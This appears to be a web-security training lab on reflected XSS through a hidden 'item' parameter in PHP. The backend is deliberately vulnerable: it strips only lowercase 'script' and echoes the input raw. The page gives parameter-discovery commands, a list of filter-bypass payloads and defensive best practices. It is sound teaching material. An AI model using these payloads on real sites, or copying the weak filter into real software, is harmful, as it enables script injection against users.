Hidden Parameter XSS Lab

Find the hidden parameter and bypass simple filtering

Hidden Parameter Challenge

Lab Overview

This lab contains a hidden parameter that you need to discover before testing XSS payloads. The visible form parameters are HTML-encoded correctly, but the same script has a second branch, reached only through a parameter that is not in the form, with a much weaker filter.

Visible Challenge: Both the first name and last name parameters are output through htmlspecialchars() with ENT_QUOTES, so <, >, &, " and ' are all encoded and no XSS is possible there.
Hidden Parameter: There's another parameter that's not shown in the form. Use tools like Arjun to discover it!
# use arjun tool to find hidden parameter
Hidden Parameter Filter: A single, case-sensitive str_replace() that deletes every occurrence of the lowercase string 'script' and echoes the result unencoded. It does not re-scan its own output, so removing one occurrence can splice a new one together.
Blocked string:
script
Filter method: str_replace('script', '', $_GET['item'])
Filter Complexity: Basic String Replacement

Objective: Discover the hidden parameter and bypass the simple 'script' filter to execute XSS. (The backend source below gives the parameter name away, so treat the discovery step as practice with the tooling rather than as a puzzle.)

Backend Source Code
<?php
// Visible form: both fields are encoded for an HTML text context (ENT_QUOTES also
// encodes single quotes). This branch wins whenever fname AND lname are present,
// so a request that carries them never reaches the hidden branch below.
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
elseif(isset($_GET["item"])){
    // Hidden parameter: one case-sensitive pass that strips 'script', then a raw echo.
    $re = str_replace('script', '', $_GET['item']);
    echo $re;
}
# use arjun tool to find hidden parameter
Test Input Forms
Challenge 1: HTML Encoding (Visible)
First name: this field uses htmlspecialchars() encoding
Last name: this field uses htmlspecialchars() encoding

Challenge 2: Hidden Parameter
Hint: The parameter name is not shown in the form. You need to discover it using parameter discovery tools, and you must send it without the two visible parameters, otherwise the encoded branch handles the request instead.
This parameter uses a simple 'script' filter (case-sensitive)
Parameter Discovery & Bypass Techniques
Parameter Discovery Tools:
  • Arjun: arjun -u https://example.com (sends batches of candidate names and looks for differences in the response; a reflected value is the strongest signal)
  • ParamSpider: python3 paramspider.py -d example.com (mines parameter names from archived URLs of the target; it cannot find a parameter that was never linked anywhere, so pair it with active fuzzing)
  • FFUF: ffuf -w wordlist.txt -u 'https://example.com/?FUZZ=test' (quote the URL so the shell does not interpret ? or &; every response here is HTTP 200, so filter on response size with -fs <baseline size> or match on the reflected value with -mr test)
  • Manual testing: Try common parameter names like: id, page, view, search, q, s, item, product, etc.
For this lab, fuzz without fname and lname in the request: the backend checks those first and never reaches the hidden branch when both are present.
Bypass Techniques for Simple Filter:
  • Case variation: Use <SCRIPT>, <Script>, <ScRiPt>; the filter only matches lowercase 'script' and HTML tag names are case-insensitive
  • Nested tags: Use <scr<script>ipt>; str_replace removes the inner 'script' in one pass and does not re-scan, so the remaining pieces splice back into <script>
  • Alternative tags: Use <img src=x onerror=alert(1)>; nothing in the payload contains the blocked string, so the filter is irrelevant
  • Event handlers: Use <body onload=alert(1)>, <svg onload=alert(1)>
  • JavaScript protocol: Use <a href="javaScript:alert(1)">click</a>; lowercase javascript: contains 'script' and would be cut down to java:, so vary the case (URL schemes are case-insensitive) or encode one character, e.g. java&#115;cript:
Security Implications

This lab demonstrates:

  • Hidden parameters can create security blind spots
  • Simple string replacement filters are easily bypassed
  • Case-sensitive filtering is ineffective
  • Parameter discovery is a critical part of security testing
  • Different endpoints may have different security levels
  • Comprehensive testing requires checking all possible inputs
Best Practices

For secure web applications:

  • Use consistent security controls across all endpoints and across every code path inside an endpoint
  • Implement context-aware output encoding (for an HTML text context, htmlspecialchars($s, ENT_QUOTES, 'UTF-8'); attribute, URL and JavaScript contexts each need their own encoder)
  • Avoid simple string replacement for security filtering: a deny-list of substrings is defeated by case changes, splicing and alternative tags
  • Use Content Security Policy (CSP) headers to limit the impact of any encoding gap that remains
  • Conduct thorough parameter discovery during testing
  • Document all API endpoints and parameters, including ones the UI never exposes
  • Use security headers: X-Content-Type-Options: nosniff; X-XSS-Protection is deprecated and ignored by current browsers, so do not rely on it
Payload Examples for Hidden Parameter
Case Variation Bypasses:
  • <SCRIPT>alert(1)</SCRIPT>
  • <Script>alert(1)</Script>
  • <ScRiPt>alert(1)</ScRiPt>
Alternative Tag Vectors:
  • <img src=x onerror=alert(1)>
  • <body onload=alert(1)>
  • <svg onload=alert(1)>
  • <iframe src="javaScript:alert(1)"> - mixed case in the scheme; lowercase javascript: would be cut down to java:
Advanced Bypass Techniques:
  • <scr<script>ipt>alert(1)</scr<script>ipt> - Nested tags: the filter removes the inner 'script' and leaves <script>
  • <scrscriptipt>alert(1)</scrscriptipt> - Double writing: same splice without the extra angle brackets
  • <SCRIPT src="data:text/javaScript,alert(1)"></SCRIPT> - Data URI; both the tag name and the MIME type must avoid lowercase 'script', or the filter turns the tag into < src="data:text/java,alert(1)">
  • <object data="javaScript:alert(1)"></object> - Object tag; same case trick, but current browsers generally refuse to run a javascript: URL as object data, so verify it in the target browser before relying on it
Any payload that still contains the lowercase substring 'script' (javascript:, text/javascript, <script>) is mangled by the filter; run each payload through str_replace('script', '', ...) yourself before sending it.